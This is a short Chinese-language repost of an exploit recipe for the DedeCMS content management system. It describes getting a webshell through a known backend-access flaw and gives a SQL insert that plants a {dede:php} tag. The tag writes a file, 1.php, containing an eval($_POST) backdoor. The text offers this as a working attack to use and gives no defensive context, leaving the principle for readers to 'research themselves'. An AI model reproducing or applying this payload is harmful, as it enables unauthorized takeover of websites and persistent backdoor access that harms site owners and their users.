作者:Shimmoon | 来源:互联网 | 2017-11-11 03:05
配合刚暴的织梦不用管理员帐号和密码就能进后台的漏洞(http:www.tmdsb.com201108dedecms-weaving-dreams-seriously-0day-vulnerabilities-latest-storm)拿webshell的方法如下:网传的都是说要知道后台才能利用,但不用,只要plus目录存在,
配合刚暴的织梦不用管理员帐号和密码就能进后台的漏洞
(http://www.tmdsb.com/2011/08/dedecms-weaving-dreams-seriously-0day-vulnerabilities-latest-storm/)
拿webshell的方法如下:
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
前题条件,必须准备好自己的dede数据库,然后插入数据:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}'); |
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。